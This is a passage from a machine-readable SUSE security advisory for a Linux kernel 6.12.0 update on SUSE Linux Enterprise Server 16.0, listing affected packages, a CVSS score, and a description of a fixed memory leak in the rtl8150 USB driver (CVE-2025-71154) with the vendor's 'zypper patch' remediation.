"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71149"
},
{
"cve": "CVE-2025-71154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71154"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: rtl8150: fix memory leak on usb_submit_urb() failure\n\nIn async_set_registers(), when usb_submit_urb() fails, the allocated\n async_req structure and URB are not freed, causing a memory leak.\n\n The completion callback async_set_reg_cb() is responsible for freeing\n these allocations, but it is only called after the URB is successfully\n submitted and completes (successfully or with error). If submission\n fails, the callback never runs and the memory is leaked.\n\n Fix this by freeing both the URB and the request structure in the error\n path when usb_submit_urb() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71154",
"url": "https://www.suse.com/security/cve/CVE-2025-71154"
},
{
"category": "external",
"summary": "SUSE Bug 1257163 for CVE-2025-71154",
"url": "https://bugzilla.suse.com/1257163"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
